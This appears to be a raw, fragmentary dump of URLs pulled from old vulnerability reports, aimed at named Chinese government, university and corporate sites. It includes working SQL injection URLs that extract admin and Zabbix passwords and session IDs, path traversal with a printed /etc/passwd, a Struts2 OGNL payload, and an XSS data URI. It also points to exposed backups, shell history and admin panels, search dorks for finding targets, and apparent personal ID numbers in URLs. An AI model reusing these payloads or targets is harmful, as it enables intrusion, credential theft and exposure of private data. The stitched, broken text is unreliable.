http://pimapi.lenovomm.com/bm/index.html?success=true http://pimapi.lenovomm.com/bm/page/feedback/feedbacktable.jsp?random=1377599101188 http://www.nmgcx.gov.cn/SoisWeb/home/index.html com:8080/ exp:http://baike.qmango.com:8080/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a com:8080/dede/ com:8080/phpwebbackup.php com:8080/wuyun.php http://www.jsca.com.cn/wrcFront/wrc_info.do 
http://www.theti.org/ inurl:eol/homepage/common/ http://conf.cnki.net/UserDo/UserRegister.aspx https://czcatv.com.cn:7071/zimbraAdmin/ www.okpay365.com https://login.okpay365.com/register/register_doRegister.action https://login.okpay365.com/css3.jsp http://support.icafe8.com/?author=1 http://www.wooyun.org/impression http://allstartv.pptv.com/portal.php?mod=topic&topicid=12%22 http://zone.pptv.com/shininghouse/upload### http://www.powercdn.com/agentcdn/me_logger/logger?startdate=2013-12-13&stopdate=2014-01-03&logtype=1 http://www.powercdn.com/agentcdn/me_financedetail/financedetail/index?financedetail[bank]=&financedetail[buytime]=&financedetail[financetype]=1 http://www.powercdn.com/agentcdn/me_order/order/view_order/866 http://www.gzfz.gov.cn/ http://www.gzfz.gov.cn:8180/xmk/proListView!init.do http://www.hzsafety.gov.cn//newsIndex/getIndex.do http://www.czssafety.gov.cn/oa/?lm=1&sumlb=124 http://www.xasafety.gov.cn/ http://www.xasafety.gov.cn/newsshow.asp?cid=21&iid=2135 http://www.flyhigh.com.cn/skin/default/js/articleComment.php?classid=7 http://www.flyhigh.com.cn/skin/default/js/articleComment.php?classid=7&id=736 http://219.143.251.250/names.nsf?Login http://oact.jdbchina.com/ http://cuapply.jdbchina.com/Budget http://v.pptv.com/show/7JB8ibmLIOHbZV78.html http://dangjian.wahaha.com.cn/party/AdminAction_login.action http://xiste.cn/ http://www.xsite.cn/demo/xsite.php http://www.xsite.cn/admin.php http://www.php.net.cn/admin.php http://siteteam.cn/admin.php。 http://acm.uestc.edu.cn/20120225.backup.tar.gz http://i.sohu.com/a/app/friend/friend/add.do?xpt=emhhb3lhbmxpbmcxMzhAc29odS5jb20%3D&from_type= http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 http://i.sohu.com/a/v2/profile/service/updatedetaildesc.htm?_input_encode=UTF-8 http://bmln.i.sohu.com/a/whisper/send.htm?_input_encode=UTF-8&nick=%E7%AC%94%E5%A2%A8%E6%B5%81%E5%B9%B4&sname=bmln&content=csrfcsrf http://www.netinnet.cn/case.asp?sid=656 http://drops.wooyun.org/papers/178 
http://www.wooyun.org/searchbug.php?q=jboss http://202.116.95.7/web-console/ http://219.219.35.4:8080/web-console/中国矿业大学管理学院会计系 http://219.223.10.16:8080/web-console/ http://59.77.47.248:8080/web-console/ http://218.104.52.218:8080/web-console/无锡商业职业技术学院会计金融学院会计实习中心 http://113.204.166.67:8080/web-console/重庆城市管理职业学院会计与贸易系会计实习系统 http://121.251.255.44:8080/web-console/ http://222.133.182.253:8080/web-console/ http://58.244.94.49:8080/web-console/ http://202.100.91.165/web-console/ http://121.10.160.138:8080/web-console/ http://210.42.124.251:8080/web-console/武汉大学经济与管理学院基础会计实训教学平台V4.0 http://gxyxoa.com:8080/web-console/广西银行学校综合实习平台 http://wzw.hznu.edu.cn:8080/web-console/杭州师范大学钱江学院经济管理分院 http://cksx.gxibvc.net:8080/web-console/广西国际商务职业技术学院财会金融系 http://121.10.160.138:8080/web-console/ http://210.42.224.96:8080/web-console/ http://218.29.67.248:8080/web-console/河南财政税务高等专科学校会计系成本会计实训教学平台V6.0 http://211.66.88.4:8080/web-console/广东农工商职业技术学院会计实训教学平台V6.0 http://218.64.220.6:8080/web-console/ http://125.221.35.114:8080/web-console/武汉软件工程职业学院商学院会计实训教学平台V6.0 http://119.6.103.5:8080/web-console/ http://219.217.240.65:8080/web-console/ http://120.42.37.3:8080/web-console/ http://demo.netinnet.cn/web-console/ http://sk.netinnet.cn/web-console/ http://demo.netinnet.cn/netinnet_cwfx_v52/help/ http://www.pigai.org/fankui/write.php?id=1 http://www.dj.cc/ http://www.vipabc.com.cn/program/search/ajax_s_query_record.asp http://abc.yaolan.com/ceshi/adminReport.action http://www3.ftchinese.com/app/logo_2010/singlework.php?id=FTC20149 DB:blogs Table:wp_users DB:mysql Table:user http://60.10.8.130:8080/admin/manager.jsp http://open.dodonew.com/front/addGame.jsp http://wan.dodonew.com/,完全可以进行脱库 http://ofvf.onefoundation.cn/ http://tao.admin5.com/web.rar http://www.cpse.com.cn/news.php?ac=info&act=about&opt=news&id=185%27%20and%201=%271 http://wahaha.tom.com/1.php http://kecheng.lyce.cn/shopadmin/index.php?ctl=passport&act=login&sess_id=1 http://bbs.21cn.com 
http://bbs.21cn.com/config/config_global.php_bak http://bbs.21cn.com/config/config_ucenter.php_bak http://www.pbfda.gov.cn:7080/powerSD/login.action http://6.cn/baby/profile/index.php?u=1 http://6.cn/baby/admin/login.php http://nanhai.hinews.cn/convert/ http://nanhai.hinews.cn/convert/index.php?a=config&source=d7.2_x1.5 http://bbs.hjsm.tom.com/convert/ http://bbs.hjsm.tom.com/convert/index.php?a=config&source=d7.2_x2.0 http://zhaoyangonline.com http://zhaoyangonline.com/reg.asp?userid=19470 http://219.141.216.136 http://www.lenovonetworks.com/asp/index.asp http://12345.hinews.cn/page.php?xuh=363 http://12345.hinews.cn/pin_lfbbc.php http://book.hinews.cn/ http://book.hinews.cn/search.php?chid=&sid=0?searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&caid=0&ccid4=0&indays=0&ordermode=0&searchsubmit=1&orderby=createdate http://book.hinews.cn/list.php?caid=27 http://book.hinews.cn/archive.php?aid=541347 http://www.hainan20.net/page_skzb.php?xuh=172 http://www.shinyv.com/css_edit/css.php http://zyjy.xtsxzfw.gov.cn/admin/index.aspx http://tmtoa.tcl.com/CTS/DigiFlowAssessTable_2012.nsf/ http://www.wumart.com/search.aspx?page=1&cType=1&kw=1一个搜索框的注入。 http://www.lemanarc.com.cn/template3.php?id=1 http://phone.tompda.com/view.asp?fulei=1 http://shop.tompda.com/mall/qiaoview.asp?mid=11149594 http://life.foxconn.com/UserLogin/handRegister.action http://www.xuancheng.gov.cn/portal/index.htm http://www.xuancheng.gov.cn/zmhd/askview.php?id=4267&pages=2 http://ahshiliang.gov.cn/ http://ahshiliang.gov.cn/info.php?left=1&cat_pid=67 http://111.13.46.101/www.tar.gz http://111.13.46.101/api/public.php?type=4&zid=1%20and%20if%28%281=1%29,1,%28select%201%20from%20mysql.user%29%29%23 http://111.13.46.101/vcode/me.php http://113.107.24.234/data/feedbackimg/867_20131219dvpudo.png/1.php inurl:admin,拿到以下连接,看了看,没动 http://admin.gb87.com/Admin/left.html http://admin.gb87.com/admin/Audit/ExternalUserList.aspx http://admin.gb87.com/admin/OutUser/UserList.aspx?PermissionID=1 
http://admin.gb87.com/Admin/TradeCenter/List.aspx http://admin.gb87.com/Admin/Ad/FloatAd.aspx?PermissionID=99 http://admin.gb87.com/Admin/left.html http://admin.gb87.com/admin/Audit/ExternalUserList.aspx http://admin.gb87.com/admin/OutUser/UserList.aspx?PermissionID=1 http://admin.gb87.com/Admin/TradeCenter/List.aspx http://admin.gb87.com/Admin/Ad/FloatAd.aspx?PermissionID=99 http://www.zooq.com/ http://zikao.hneao.cn/net/pages/net/found_bkd_list.jsp?site_code=010106 http://zikao.hneao.cn/self-study http://www.scut.edu.cn/qgysp/ http://202.38.194.195/qgysp/view.php?n_id=1947 http://202.38.194.195/ http://ideaservice.lenovo.com.cn/ts/login.aspx http://ideaservice.lenovo.com.cn/ts/login.aspx http://i.sohu.com/a/app/mblog/delete.htm?id={$id http://i.sohu.com/a/app/friend/friend/add.do?xpt=aXNtaWxlbnRAc29odS5jb20=&from_type=usercard&pageid= http://www.dell-solution.com/ActivityInfo.aspx?id=516 http://www.wanda-cti.com http://www.wanda-cti.com/index.php?a=get_days&c=index&catid=7 http://edong.com/Host/Gspace_list.aspx?Product_ClassId=1&line_Id=3 http://www.edong.com/Host/host_index_list.aspx?Product_ClassId=1&line_Id=1&i=0 http://www.edong.com/NLG/Default.aspx?NLGTopic=31&NLGTopic1=31&NLGTopic2=31&NLGTopic3=31&NLGTopic4=31 http://edong.com/News/Default.aspx?Newsclid=39 http://www.edong.com/admin/OWeblogin.aspx http://222.75.160.166/login.jsp http://brand.66wz.com/store.php?id=18 http://ncda.xamwsj.gov.cn/login.action data:text/html;base64,PFNjcklwdD5hbGVydCgyKTwvU2NyaVB0Pg== http://lenovoprinterclub.com http://www.lenovoprinterclub.com/about_procontent.php?contentid=18 http://www.lenovoprinterclub.com/newscontent.php?contentid=83 http://www.lenovoprinterclub.com/newsconten http://sqlmap.org http://dynamic.766.com/simulator/dnfbs/search/count_keyword http://www.fulinmen.com.cn/FCKeditor/editor/filemanager/connectors/test.html 
http://www.fulinmen.com.cn/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/d:/web/www.fulinmen.com.cn http://sy.leconte.com.cn/LoveHome/main.html http://www.hebmaj.gov.cn/shownews.asp http://www.17u.cn/dujia/AjaxCallNew.aspx?lineId=40202&MId=113&type=GetPrintContent www.17u.cn/dujia/AjaxCallNew.aspx?lineId=40202&MId=113&type=GetPrintContent http://www.lhjk.gov.cn/web_com/lhjk/offer_advice/init.action?flag=0 http://www.hzbiz.gov.cn/page.action?pid=3193 http://life.21cn.com/life.zip http://class.examw.com/player/teacher.asp?ClassID=35&tid=2 http://www.bhdy.gov.cn/ http://www.bhdy.gov.cn/bhhsGuide/user.do?method=userhomeInfo&authorId=1280 http://www.bhdy.gov.cn/bhhsGuide某处可以查看1278个初始的账户密码:123456 http://jjc.xjedu.gov.cn/index/index.php http://jjc.xjedu.gov.cn/xj_view.php改成http://jjc.xjedu.gov.cn/admin变成功进入后台! http://jjc.xjedu.gov.cn/index/index.php http://design.gbicom.cn/dede/ http://www.51zhangdan.com http://www.51zhangdan.com/manage/ https://www.51zhangdan.com/manage/ https://183.129.178.139/manage/ http://passport.zte.com.cn/editorial/ztecn/ch/author/check_user.aspx?user_name= http://jjzx.nau.edu.cn/zlgc/ http://jjzx.nau.edu.cn/zlgc/admin http://bbs.cnfol.com/utility/convert/ http://bbs.cnfol.com/utility/convert/index.php?a=config&source=d7.2_x2.0 http://faq.xiaomi.cn/message/new.html http://120.31.133.202/226/xxxxx.tar http://deskadmin.cctv.com http://deskadmin.cctv.com/playsort.php?localid=60 http://xxgcx.sccc.edu.cn/pthbm/ http://www.pzhaic.gov.cn:7010/article!detailBAGG.action http://gssns.whhd.gov.cn/dhb/index.html http://www.9nuo.com/mobile/index.asp?id=48&act=content tu.roowei.com/Album/?Album_ID=5232&Indexes=1&width=1366&height=768 line:426 http://xlzx.nau.edu.cn/源码直接下载 http://xlzx.nau.edu.cn/1.rar http://xlzx.nau.edu.cn///安装说明.txt http://www.crfeb.cn/rcpd/bargain/web/login.asp http://iaep.nau.edu.cn/admin/ http://2012b2c.juneyaoair.com/ http://movie.weibo.com/movie/site/search?q=xss 
http://www.tcm.gov.cn/tcm/ztnews.asp?id=1 http://www.ecb.chinanetcenter.com/shop_admin/forgot.php http://bz.5sing.com/down/1683980 http://www.panshi.gov.cn http://www.qdpa.gov.cn/MoreNewsList.aspx?Permission_ID=P002_001*&pageindex=1&str= http://www.sdpa.gov.cn/DetailNews.aspx?NewsID=2834&MenuID=P002_003_003* http://123.233.247.74/wjj_site/ldaplogin/login_login.action http://www.renhua.gov.cn/website/portal/PortalAction!index.action http://passport.womaiapp.com/登录跳转的系统就可以可以看到了。 http://ued.ctrip.com/blog/wp-login.php http://sp.nanning.gov.cn/nnzw/GscApproveProject/index.action http://emp.xungsoft.com/zjkcmcc/index.aspx http://zxxx.hebxzxy.gov.cn:8080/portal/index.action http://www.ciqbridge.gov.cn:8080/regent/loginoa.action http://ybxm.nbhrss.gov.cn/webapp/xssb/zhjfwwcx/index.action http://admin.angelcrunch.com http://zjcredit.zjdpc.gov.cn:8000/Default.aspx http://zjcredit.zjdpc.gov.cn:8090/credit/dynamicnewsAction!toDetail.action http://0.mp3正确的地址发现界面正常 http://0.mp3\之后 http://zwzx.wuchang.gov.cn/new/web/blzn/bszn_spiteminfo.jsp?spitemid=42010600GS-XK-0021-002 http://www.zcasc.gov.cn/application/wsbs/bszn/qysrgbdb_spiteminfo.jsp?spitemid=20130703102813875056 http://zwzx.gzwuchuan.gov.cn/application/ztxz/xzjj.jsp?type=81&departid=4 http://www.cyxzfw.gov.cn/application/zwgk/xzzhinanxiang.jsp?dhbt=%CD%F8%C9%CF%B0%EC%CA%C2&ZJJGDM=726108715&depName=%B3%A4%D1%F4%CF%D8%B9%AB%B0%B2%BE%D6%CF%FB%B7%C0%B4%F3%B6%D3长阳土家族自治县政务服务中心 http://www.kyasc.cn/application/wsbs/bszn/xzzhinanxiang.jsp?ZJJGDM=16971551&depName=%B8%DF%D5%AF%B4%FA%C0%ED贵州省开阳政务网 http://www.xnxzfwzx.gov.cn http://www.xnxzfwzx.gov.cn/application/hdzl/bgxz/formdowm.jsp?SPITEMID=421201011337629027&depName=%E6%B0%B4%E5%8A%A1%E5%B1?&zzjgdm=011337629 http://blog.douguo.com/ http://blog.douguo.com/wp-admin/ http://bbs.my399.com/config/config_ucenter.php.bak line:103 http://www.foundertype.com/admin/FCKeditor/editor/filemanager/upload/test.html http://www.czjs.gov.cn 
http://www.czjs.gov.cn/egov/was/web/jsbsdt/common.jsp?url=demo/qt/service_detail_front.jsp&serviceid=456EEE0F569B404A3E5BB54E8B94989B http://www.lanrentuku.com/js/search/q= http://218.249.66.220/evaluation/WebRoot/Login/login.php http://www.blued.cn/FindPassword http://qfoa.qfkd.com.cn/ http://www.fenby.com/ site:ubn.cn inurl:P_detail.php?nodeID= http://www.w55929.ubn.cn/main/P_detail.php?nodeID=102836 inurl:P_detail.php?nodeID= inurl:shop.php?idDept= http://e.meituan.com/shop/ http://www.ajzw.gov.cn/ http://club.suning.com site:club.suning.com inurl:profile https://passport.suning.com/ids/login ztadmin.house365.com/admin.php http://wooyun.org/bugs/wooyun-2013-044050 http://wooyun.org/bugs/wooyun-2013-031912 http://wooyun.org/bugs/wooyun-2013-044050 http://follow.chinacache.com http://follow.chinacache.com/verify.php?id=111&confirm_hash=75c29fb65********* site:bbs.gome.com.cn inurl:profile http://home.inc.hc360.com/homenew/Home/View.asp http://www.hn.189.cn/hnselfservice/orderinfoservice/shop-order!showOrderListForCart.action?numValue=430403197711081103 http://hn.189.cn/hnselfservice/orderinfoservice/shop-order!showOrderListForCart.action?numValue=43020419820202205X site:189.cn http://image.bitautoimg.com/UploadPic/2013/12/22/20131222071206.php http://sb.zjinfo.gov.cn/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.qyslyj.gov.cn/Foosun/Admin/Login.asp http://www.qyslyj.gov.cn/FooSun_Data/FooSun_Data.mdb http://smtp.cntv.cn/cntv.zip http://pop.mail.cntv.cn/cntv.zip http://vip.cntv.cn/ site:xywy.com inurl:php http://www.ahhr.com.cn/Detail.aspx?id=82120 ext:as协议引起的http- ext:as:navi_online_index-479*1248-U90888:file:///mnt/sdcard/payload.html ext:uc_dw可以无提示地下载任意类型的文件,而且request是带着相应cookie的,并保存在固定目录,下载文件名也是可预测的。所以思路就是使用ext:uc_dw把想要读取的内容下载到本地,然后再读取本地文件(file域读取file域没有限制)。 http://eclub.chinacache.com/reg/index.aspx注册未过滤导致注入 http://post.tom.com/ http://sfocs.sf-express.com:8080/ http://www.mtvchina.com 
http://www.mtvchina.com:80/.bash_history mtvchina.com/www/db_2******8.sql mtvchina.com/www/db_2******8.sql mtvchina.com/www/db_2******8.sql mtvchina.com/www/db_2******8_utf8.sql mtvchina.com/www/db_2******8_utf8.sql http://rds.blog.alibaba-inc.com/ site:alibaba-inc.com http://rds.blog.alibaba-inc.com http://rds.blog.alibaba-inc.com/ http://eclub.chinacache.com/reg/getpwd.aspx http://eclub.chinacache.com/reg/index.aspx http://webi.tom.com/include/ http://www.oschina.net/code/download_src?file=../../../../../etc/passwd http://cs.now.cn/nowcn/ http://shop4.now.cn/admin http://cs.tnet.hk/dede/ http://cs.eranet.com/dede/ http://admin.3595.com/Login.Aspx http://post.news.tom.com/post.tar.gz http://post.tom.com/post.tar.gz http://post.weiqi.tom.com/post.tar.gz http://post.auto.tom.com/post.tar.gz http://post.she.tom.com/post.tar.gz http://www.zhihu.com/question/22337798/answer/21056338 http://www.sxdachang.com/admin/ host:zhandian.cctv.com http://zhandian.cctv.com/ http://doctor.zjwst.gov.cn/20120913/Village_Doctor/DownData/ http://dns.zjwst.gov.cn/DownData/ http://netcenter.cau.edu.cn/jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig http://photo.weibo.com/users/follow http://photo.weibo.com/users/follow http://119.254.84.155/ http://119.254.84.155/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://119.254.84.155/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 
http://url/pertool_subsite/skins/压缩包内shell地址 http://10.11.5.201:9080/jis/front/sso.jsp?uri=loginuser=2011080332531 http://www.bypay.cn/ http://passport.eastmoney.com/FindPwd.EmUser http://119.254.82.134 http://119.254.82.134/.bash_history http://114.247.88.17 http://114.247.88.17/wiki/images/ http://www.qianwango.com/data.rar http://www.qianwango.com/kdjj_hdak_wiuhsdbd_sou.mdb http://www.qianwango.com/iis.aspx比较坚挺,尝试了admin的原始口令就pass了 http://wap.iask.com/etc/hosts http://wap.iask.com/etc/passwd http://119.6.92.54/security/ http://12582.10086.cn/Activity/DialLottery/HappyKnockEgg/1499613 http://www.rest.com.cn/NewsDetails.aspx?SWQ9MTQw URL:http://100inn.cc/NewsDetail.aspx?newid=140 http://ued.focus.cn http://www.inca.com.cn/ http://ls.qayy.com:7088/sws/login.action http://218.92.21.179:3333/gys/login.action http://www.angelcrunch.com:80/ www.angelcrunch.com http://119.6.92.60/ http://119.6.92.60/database/ http://119.6.92.60/bin/ http://119.6.92.45/ http://119.6.92.45/module/ http://119.6.92.45/upload/ www.hbzljd.gov.cn/jsp/zwgk/browser/content.jsp?id=727存在注入点 http://new.100inn.cc/目录遍历 http://www.glj.hbjt.gov.cn/jsp/jzxx/browser/View.jsp?id=235存在注入点 http://www.sqk.com.cn:8008/ http://www1.ahedu.gov.cn/gxbys/show.asp?id=183 http://uplive.bypay.cn/manager!managerLogOut.ac http://channel.3g.youku.com/ykmks/index.jsp http://124.115.22.130/ http://www.yurun.com/yurun_behind/htmledit/upload.asp http://wooyun.org/bugs/wooyun-2010-041330 http://59.46.220.76/common/.svn/text-base/page_macro.ftl.svn-base http://www.hbnz.gov.cn/UploadFace.asp http://www.hbnz.gov.cn/bottom.asp http://www.hbnz.gov.cn/editor/upload.asp http://www.hbnz.gov.cn/login.asp http://www.hbnz.gov.cn/upme1.htm http://www.hbnz.gov.cn/Pic.asp http://10.11.5.201:9080/jis/front/upduser_do.jsp http://blog.umeng.com/ http://angelcrunch.com/settings/profile https://it.qdone.com.cn/console/index!login.action https://y.qdone.com.cn/mmp/login.action https://paymoney.qdone.com.cn/HuiFK/login.action 
http://jiaofei.qdone.com.cn/payment/login.action http://mer.qdone.net.cn/hfk/login.action http://h.qdone.net.cn/console/merchantLogin!merchantLogin.action https://ecitic.qdone.com.cn/hfk/login.action http://market.qdone.net.cn/market/login.action https://it.qdone.com.cn/console/index!login.action https://y.qdone.com.cn/mmp/login.action https://paymoney.qdone.com.cn/HuiFK/login.action http://jiaofei.qdone.com.cn/payment/login.action http://mer.qdone.net.cn/hfk/login.action http://mer.qdone.net.cn/hfk/login.action http://h.qdone.net.cn/console/merchantLogin!merchantLogin.action https://ecitic.qdone.com.cn/hfk/login.action http://market.qdone.net.cn/market/login.action http://portal.zfsoft.com:8799/khxt/userLogin.action http://124.205.51.138 http://bbs.freshpower.cn http://221.176.8.37:8080/indexPage.action http://www.dodopal.com/bangzhuzhongxin/wodezhanghu/zhuceyujihuo/2011-03-15/585.php https://application.dodopal.com:9998/fapayf/chargeCard.action https://cq.hzt360.com/distribution/distribution https://58.56.23.89:9443/paygate/paygate.action http://xss.tw/999 http://bbs.pcgames.com.cn/topic-2805469.html http://12580.10086.cn/member/find_password_input.jsp http://www.sjgj.cn/mainAction.action http://go.zzz4.com/User_Show.asp?id=15 http://118.194.32.61/FCKeditor/editor/fckeditor.html http://egov.guang-an.gov.cn/egh/ http://egov.guang-an.gov.cn/egh/FileUploads/ http://egov.guang-an.gov.cn/egh/UserKeepFileUploads/ http://ha.189.cn/ http://58.83.206.67 http://58.83.206.67/orderAccountAction/orderAccountPage.action http://supp.jd.com/suppliersystem/ http://***/install/install.php http://shop322763.p13.shopex.cn/ http://www.zjgwater.gov.cn/newsview.asp?id=2202&BigClassName=%B8%DB%B3%C7%CB%AE%C0%FB&title=%CC%C1%C7%C5%D5%F2%D6%F7%D2%AA%C1%EC%B5%BC%CA%D3%B2%EC%B6%AC%B4%BA%CB%AE%C0%FB www.xadaj.gov.cn/jsp/galleria/eweb/show.jsp?id=17718 moa.scal.com.cn/qq.asp moa.scal.com.cn/test/2.asp http://ess.lenovomobile.com http://ess.lenovomobile.com/regiStep2.aspx?MbrID=8410 
http://ess.lenovomobile.com/regiStep4.aspx?MbrID=8409 http://xyschool.xyedu.gov.cn/ http://www.ycwater.gov.cn/news_show.asp?id=9760&wz=%D0%C2%CE%C5%D6%D0%D0%C4 http://58.213.154.146:8488/GYS/login.action‎ http://agentcrm.inc.hc360.com/ http://m.dangdang.com/sms.php?k=f198a79b9cF http://rd.kuaijianli.com/ http://rd.kuaijianli.com/?a=get_manager&job_type=&have_internship_job=-1&end_id=0&_=1387958284657 http://custom.haiziwang.com/tuangou/detail.htm?id=1713b7d20afe49d19932c9be6f78b0ea http://job.abchina.com/prs/testCardEdit.do?action=loadTestCard&jobapplid=46119158 http://job.abchina.com/prs/testCardEdit.do?action=loadTestCard&jobapplid=46119160 http://zixun.110.com/5e27fa9f1e017d329261a023f2400ce1/login.php http://www.ftkenglish.com/index.php?controller=active&action=index&m=/../../../../../../../../../../../../etc/passwd%00.html root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous 
User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false ntp:x:38:38::/etc/ntp:/sbin/nologin http:x:501:501::/home/http:/sbin/nologin phper:x:501:501::/var/www:/bin/bash zabbix:x:503:503::/home/zabbix:/sbin/nologin http://125.88.123.189/ http://118.194.34.122/manage/login http://www.wxps.gov.cn/System/Login.aspx http://usermz.5see.com/,登录,我的注册号:xix11111 http://usermz.5see.com/guestbook/q981358 http://www.jxfc.gov.cn http://www.jxfc.gov.cn/cms/admin/login.action http://www.wbus.cn/ http://125.69.85.51:8088 http://www.saymamu.com/flow.php http://www.isite.kometo.com//install/install.php http://www.digitalchina.com.hk/c/product_details.php?id=8084 http://www.grandfortunebayhotel.com/BGR$admin/index.asp http://www.webluker.com/webtools/snmp http://www.wooyun.com/a.php?hacking=$hack http://demo.xiaomayi.co/public/ajax.aspx?action=showmoodshop&id=1416&mode=update&StringValue=4Sl7d3fY&_=1387864247768 demo.xiaomayi.co/public/ajax.aspx?action=showmoodshop&id=1416&mode=update&StringValue=4Sl7d3fY&_=1387864247768 http://hudong.moc.gov.cn:2517/admin/ RUL:http://hudong.moc.gov.cn:2517/opinion/display/ http://hudong.moc.gov.cn:2517/opinion/display/images/CL-03.jpg http://hudong.moc.gov.cn:2517/admin/ http://design.gbicom.cn inurl:help/HelpAdd.aspx http://www.xxx.com/help/HelpAdd.aspx http://www.sxdachang.com/data_base/qiye_data@@.mdb mongodb://220.181.90.188:10000 http://www.wdds.com.cn/wdbh/web/member/getCardInfo.do http://171.34.69.197/license!getExpireDateOfDays.action http://www.qz10085.com/zxb.html file://本地文件域),解析执行其中的代码。 http://www.cdsmes.com/wzpt/qdzxfw/zxfwinit.do inurl:/module/jslib/jquery/jpage/dataproxy.jsp 
http://www.bjmu.edu.cn/module/jslib/jquery/jpage/dataproxy.jsp?startrecord=1&endrecord=100&perpage=100&appid=1&webid=1&path=%2F&columnid=4866&unitid=117&webname=%E5%8C%97%E4%BA%AC%E5%A4%A7%E5%AD%A6%E5%8C%BB%E5%AD%A6%E9%83%A8 http://www.sqsc.gov.cn/module/jslib/jquery/jpage/dataproxy.jsp?startrecord=1&endrecord=15&perpage=15&col=1&appid=1&webid=1&path=/&columnid=19&unitid=325*&webname= http://www.sqsc.gov.cn/module/jslib/jquery/jpage/dataproxy.jsp?startrecord=1&endrecord=40&perpage=40&col=1&appid=1&webid=1&path=/&columnid=19&unitid=325&webname= http://www.ntwater.gov.cn/module/jslib/jquery/jpage/dataproxy.jsp?endrecord=60&perpage=20&startrecord=1 http://app.info.hc360.com/ Destinaction:http://app.info.hc360.com/iistest.asp http://www.chuangyiren.cn http://218.106.133.55/Login.aspx?userRequest=http%3a%2f%2f218.106.133.55%2fdefault.aspx Destination:http://218.106.133.55/iistest.asp http://www.weixintuo.com/wxt/home/LoadHome.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://www.jngt.gov.cn/jngt/login.action http://125.88.6.155/coms/login.jsp http://125.88.6.156/coms_wh/login.jsp http://www.czsie.com.cn/ http://125.88.6.155/coms/login.jsp http://125.88.6.156/coms_wh/login.jsp http://125.88.6.155/coms/ http://125.88.6.156/coms_wh/ http://www.tclbusiness.com//phpsso_server/?m=admin&c=index&a=init&forward= http://200.200.87.150:911/member.php?app=2&member=&action=43 http://u.china.com/photo/?_a=editalbum&albumid=22615 http://s.anjuke.com/config.php http://121.14.129.111/ http://survey.sohu.com/list.php 
